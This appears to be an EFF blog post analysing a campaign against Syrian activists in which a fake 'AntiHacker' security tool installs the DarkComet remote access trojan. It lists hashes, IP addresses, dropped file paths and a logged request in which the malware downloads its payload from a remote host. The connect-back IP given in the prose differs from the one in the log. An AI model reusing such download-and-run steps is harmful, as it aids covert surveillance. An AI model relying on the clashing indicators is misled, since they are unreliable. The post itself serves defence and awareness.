As the violence escalates across Syria, so do the campaigns of targeted malware attacks against Syrian activists, journalists, and members of the opposition, which covertly install surveillance software on their computers. Syrians are growing more aware of the danger these campaigns pose to their security and the security of their friends and loved ones. On Facebook, the Union of Free Students in Syria group has started an album of students holding up signs warning against phishing attacks and malware, with messages that such as, "Assad supporters are sending dangerous files with hacked accounts. Check with your friends before opening an attachment."
The latest malware campaign plays into users' concerns about protecting their security by offering a fake security tool called AntiHacker, which promises to provide "Auto-Protect & Auto-Detect & Security & Quick scan and analysing."[sic] EFF's analysis indicates that this campaign is the work of the same actors behind several malware campaigns that lured their targets in using fake revolutionary documents and a fake Skype encryption tool--campaigns that date back to at least November 2011.
While it proports to provide security against hackers, AntiHacker instead installs a remote access tool called DarkComet RAT, which allows an attacker to capture webcam activity, disable the notification setting for certain antivirus programs, record key strokes, steal passwords, and more. Over a dozen of the attacks EFF has analyzed have installed versions DarkComet. It's increasingly close association with pro-Syrian-government malware, combined with the Human Rights Watch report on the Assad regime's network of torture centers, may have motivated the project's sole developer to shut it down, declaring his intention to work on an alternative tool that more closely resembles VNC and requires administrative access to install.
The AntiHacker tool even has a Facebook group, shown in the screenshot below:
The Facebook group includes a link to a website, shown in the screenshot below. This domain has been disabled, but the website is still up at the following IP: 188.8.131.52.
The site offers a download of AntiHacker.exe (md5sum af8e0815a0f44a78a95a89643f7c9ce6), shown in the screenshot below:
Unlike the fake Skype encryption program, this fake program does not abuse Comic Sans, but it does feature several suspicious errors, including a pop-up that reads: "You Are Running On unprotected Conection You Maybe At Risk !!!!" [sic], shown in the screenshot below:
Once the user has run the program, AntiHacker displays a pop-up that reads "You PC is Protect now thank for using our Product." [sic]
Instead of providing any kind of protection against hackers, AntiHacker connects back to 184.108.40.206 and attempts to download google.exe (md5sum 499d9bb81a79359523c9e6ef05f1b0d0):
TCP 0.0.0.0:0 Send 220.127.116.11:80
GET /google.exe HTTP/1.1
When google.exe is run it installs, Dark Comet by dropping the following files, shown in the screenshot below:
Additionally, it creates a keylogger file called C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dclogs.sys once the user begin typing. This file is not shown in the screenshot.
It also creates C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\..lnk, shown in the screenshot below:
This version of DarkComet is not detectable by any anti-virus software as of August 1, 2012. However, it is detectable by the DarkComet RAT removal tool, written by the same developer that originally wrote DarkComet RAT. The screenshot below shows the removal tool detecting DarkComet RAT on an infected computer:
Syrian Internet users should be especially careful about downloading applications from unfamiliar websites. The AntiHacker website showed many signs of being illegitimate, including prolific abuse of English spelling and grammar, but this campaign demonstrates that while Syrian activists are becoming more savvy about efforts to trick them into downloading malware, attackers are also becoming more sophisticated.